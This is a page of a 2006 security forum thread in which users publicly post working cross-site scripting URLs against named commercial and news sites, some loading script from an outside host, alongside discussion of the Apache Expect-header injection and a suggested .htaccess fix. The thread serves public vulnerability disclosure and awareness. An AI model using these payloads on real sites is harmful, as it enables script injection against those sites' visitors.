Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011...LastNext
Current Page: 3 of 65
Re: So it begins
Posted by: Kyran
Date: September 21, 2006 12:30AM

It better not be your grandma. I remember rsnake 'hacked' into 127.0.0.1 earlier and found loads of grandma porn. He might try something sneaky.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 21, 2006 10:23AM

Dude, this guy I hacked at 127.0.0.1 is a freak... grandma porn, greasy midget porn... the works!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: raif
Date: September 21, 2006 10:55AM

haha, no i'm not your grandma. this is what led me to those sites:

intext:"site search"

damn you google! *shaking fist*

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 21, 2006 11:11AM

http://search.dangdang.com/dangdang.dll?key=%22%3E%3Cbody%20onload=alert(%22XSS%22)%3E&search_btn_top=%D4%DA%CB%F9%D3%D0%C9%CC%C6%B7%D6%D0%CB%D1&key1=&key2=&key3=&key4=&key5=&mode=&catalog=&sel1=1&sel2=1&sel3=1

Dang! Dangdang!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 21, 2006 01:49PM

Looks like this particular thread has gotten some press guys:

http://www.darkreading.com/document.asp?doc_id=104313&f_src=darkreading_section_296

Keep up the good work. Sooner or later companies will start taking this seriously.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 21, 2006 02:10PM

Great! Along with the ha.ckers post and the networkworld.com article, perhaps this will not just speed up the proccess but force companies to do something about it.

On a side note, another XSS...on the site talking about XSS!
[www.darkreading.com]

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 21, 2006 02:29PM

I love that you found that flaw on darkreading, I wonder if they'll actually re-read this thread and fix that.

After reading that my ego got a boost and a half :p

Anyway.... back to my web developing.

Edit: if you are planning to leave a comment in that article then... *cough*bugmenot.com*cough*

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 09/21/2006 02:32PM by WhiteAcid.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 21, 2006 03:01PM

Hahah! Be careful or people still stop linking to us! But if nothing else it proves the point - XSS really is everywhere.

Try this in Internet Explorer (mazda.com): http://ha.ckers.org/expect.swf?http://www.mazda.com/

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 21, 2006 03:07PM

http://nbc.resultspage.com/search?ts=custom&p=Q&uid=&w=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 21, 2006 03:32PM

Hmmm... I'm vulnerable to expect thing too. I know I can set up a custom error page but is there anything else you can suggest? Keep in mind whiteacid.org is on shared hosting so I can't edit httpd.conf

I may have missed a blog post or somethign, but can you give me some info on this flaw?

Edit: I've decompiled and read the actionscript, I've also sniffed thre traffic while running the swf off my localhost, so I can see why it's doing, but why is it IE only? Why does only IE print that header onto the page?

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 09/21/2006 03:49PM by WhiteAcid.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 21, 2006 03:59PM

Here is the original post about this - it was an Amit Klein find (and the .swf file is his too - I just borrowed it): http://ha.ckers.org/blog/20060731/expect-header-injection-via-flash/

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 21, 2006 04:34PM

Thanks

I just figure out why it doesn't work in firefox, here's the HTTP request created when I used IE:
GET / HTTP/1.1
Accept: */*
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Expect: <script>alert(’http://www.whiteacid.org is vulnerable to the Expect Header vulnerability.’);</script>
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: www.whiteacid.org
Connection: Keep-Alive

Here's that same request using firefox:
GET / HTTP/1.1
Host: www.whiteacid.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://127.0.0.1/expect.swf?http://www.whiteacid.org
Cookie: [removed]

Firefox doesn't allow/support the request header. Now then.... what are your suggestions on fixing this? Custom error page?
Edit: IE didn't post a referer but firefox did.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 09/21/2006 04:37PM by WhiteAcid.

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 21, 2006 05:11PM

I emailed Apache this:
Hey

It's possible to run JavaScript on an arbitrary server using the
Response header. This works only in IE (tested with IE and FF) as FF
doesn't support/allow the header. To be honest I don't know if this is
IE fault or Apache, why I'd naturally lean towards it being IE fault,
I have this feeling that the Apache server is partly to blame too.
I've written about this here:
http://blogs.securiteam.com/index.php/archives/628

If you just want to test this yourself have a look here (in IE):
http://ha.ckers.org/expect.swf?http://www.mazda.com
http://ha.ckers.org/expect.swf?http://www.beyondsecurity.com

I'm not entirely sure how to fix this either, the only thing I can
come up with so far is creating a custom error page.

Thanks for your time.
Sid

The reply:
Hi Sid; This was previously reported in May, see
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918

We fixed this by escaping the Expect error message in Apache HTTP Server
1.3.35, 2.0.58, and 2.2.2. I notice that this isn't mentioned on our
vulnerbilities page, which we'll correct tommorrow.

Thanks for contacting us.

Regards, Mark

Edit: oh and since the previous darkreading one was fixed, here's more:

http://www.darkreading.com/boards/message.asp?msg_id=138506<script>alert('xss')</script>
http://www.darkreading.com/boards/search.asp?search=<script>alert('xss')</script>&topic_id=30&thread_id=121715&filter=message_subject

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 2 time(s). Last edit at 09/21/2006 05:27PM by WhiteAcid.

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 21, 2006 05:26PM

I just got home again and the darkreading hole was fixed, it seems.
Just more exposure for XSS, right? As the article said, it's lucky we aren't the bad guys.

As far as the EXPECT goes, I think for now the only real fix is a custom error page.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 21, 2006 05:29PM

The post before yours has two more darkreading XSSes
If you can, upgrade Apache. I've emailed asking them what they suggest for work arounds if you can't upgrade (for instance if you're on a shared hosting).

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 21, 2006 06:05PM

Did you try an .htaccess file with something like:

ErrorDocument 417 http://www.whatever.com/

I haven't tried it, so your milage may vary, and it depends on if the apache install is set up to allow for .htaccess overrides.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 21, 2006 10:40PM

http://one.revver.com/browse/%3CBODY%20onload=alert(%22XSS%22)%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 21, 2006 10:54PM

Mac guys really annoy me. =___=
And for those that've heard about it since BlackHat, even now when they get their ass handed to them as Apple releases a patch for the supposedly 'fake vulnerability' .. they're still complaining. Apparently since he told them the vulnerability existed, and in which driver - but didn't tell them exactly where - .. now that Apple has located it, proving it exists, it doesn't count because Apple found it. I really don't understand their smug illogical religion.

/*end rant.*/

In Other News, http://www.macworld.com/search/index.php?as=1&st=1&rf=1&rq=0&col=mwmcc&oqsecrets=url%3Asecrets+&dt=ba&ady=21&amo=9&ayr=2005&bdy=21&bmo=9&byr=2006&qt=%3Ciframe+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C&nh=10&Search=Search+Again

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 21, 2006 10:57PM

Nice... got the iframe exploit in there, huh? Yah, I was never much of a Mac guy...

1) Amiga
2) OS2
3) NEXT
4) Mac

Can we see a trend here? ;)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 21, 2006 11:07PM

This is why I should own hacker.com: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://hacker.com/enter.asp&hacker=www.hacker.com&name=&address=&city=&state=&postalcode=&country=&phone=&email=&offer=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&comments=&Submit=Submit

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 21, 2006 11:16PM

http://www.weather.com/search/enhanced?where=<script>alert('quack')</script>

http://search2.foxnews.com/search?ie=UTF-8&oe=UTF-8&client=my_frontend&proxystylesheet=my_frontend&output=xml_no_dtd&site=default_collection&q=%22;alert('quack')//

thx to WhiteAcid for the help on the fox one.

http://www.independent.co.uk/search/simple.do?searchString=%3Cscript%3Ealert%28%27quack%27%29%3C%2Fscript%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 09/21/2006 11:56PM by digi7al64.

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 21, 2006 11:18PM

Weather that goes quack? Interesting...

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 21, 2006 11:19PM

Also, http://www.macworld.com/info/contact/form.php?e=///Not%20a%20Sploit%5C%22%20%3Cscript%3Ea=/XSS/;alert(a)%3C/script%3E

i really never gave email forms the attention they deserved in the past :/

Edit: note to self, make use of preview button before posting.

-maluc



Edited 1 time(s). Last edit at 09/21/2006 11:46PM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 21, 2006 11:45PM

Also, http://docs.info.apple.com/article.html?artnum=1233';alert('Shiver%20me%20Timbers.');document.location='http://%6D%61%63-%73%75%63%6B%73.com';a=%27

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 22, 2006 11:56AM

Are XSS threats overblown?
http://www.scmagazine.com/us/news/article/594339/xss-flaws-jump-top-cve-rankings-threat-overblown/

Funny you should mention it:
http://www.scmagazine.com/us/search/index.cfm?fuseaction=XCU.Search.Simple&sSearchPhrase=%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org/xss.js%20&sSection=ALL&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 22, 2006 12:08PM

Quote

"XSS is now No.1. It literally took one year and probably less to reach No. 1," he said. "It actually pushed buffer overflow down to No. 4."
Well... that drop for overflows isn't all due to XSS, two other techniques must have helped.


Quote

[xss is] especially rampant because of the popularity of social networking sites.
No, it's rampant due to crappy coding.


The title is "...but is the threat overblown" but the article never mentions the thread being overblown (or the contrary). The only thing I saw was that the word overblown was also used in here:
Quote

The number of XSS flaws may be blown out of proportion
But that has nothing to do with the threat, that's the number of XSSes


Quote

"This is important to realize because XSS is now ranked by CVE as the most prevalent vulnerability, even more prevalent than buffer overflows," he said.
Yes, you already said that.

That "news" article severely needs re-writing.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 22, 2006 12:14PM

XSS in zdnet, also they are copypasta-ing the Mitre article there.
[www.zdnet.co.uk]




On another note, we made the news again.
http://www.scmagazine.com/uk/news/article/594339


EDIT - Ahaha. I had this window open for too long I suppose. Beat me to it.

- Kyran



Edited 1 time(s). Last edit at 09/22/2006 12:14PM by Kyran.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 22, 2006 12:27PM

it's on scm's site, but a different domain hosting it:

http://www.careerbuilder.com/JobSeeker/Jobs/JobResults.aspx?S%3Asbkw=%22+style%3D-moz-binding%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29+&S%3Asbcn=&S%3Asbsn=ALL&S%3Asbfr=30&S%3Asbsbmt=Search&cbsid=fa120e683b24470a9976bd14e5936ce9-212245906-WF-2&cid=US&lr=cbscmag&IPath=ILK&excrit=QID%3DA3849780031904%3Bst%3DA%3Buse%3DALL%3BrawWords%3D

firefox only, for autofun

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 22, 2006 12:42PM

Ahh, this one's on their domain: http://www.scmagazine.com/us/awards/voting/index.cfm?fuseaction=XCU.Awards.Voting.Vote&nSubCatID=26140&uCategoryUuid=401b5be2-9cee-4298-9da4-0eaa4bf82348&uNomineeUuid=58f3627d-70e4-4bd7-bc30-ab660cdb17dd&sRandomString=66EDC001&checkCriteria_sName=You%20Are%20Voting%20On..%22%3E%3Cscript%3Ealert%28%22overblown%3F%21%22%29%3C%2Fscript%3E%3Cr%22&checkCriteria_sEmail=Best%20Web%20Filtering%20Solution&checkCriteria_bIsITProfessional=0&checkCriteria_bIsSubscriber=0&checkCriteria_bIsUSResident=0&checkCriteria_sCode=Ironic?&submit=submit

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 22, 2006 01:05PM

I've been thinking, unless you are doing something sarcastic/ironic like maluc, perhaps we should all use the ha.ckers.org/xss.js script to show that remote scripts could be executed. Otherwise it's just an alert.

- Kyran

Options: ReplyQuote
Pages: Previous1234567891011...LastNext
Current Page: 3 of 65


Sorry, only registered users may post in this forum.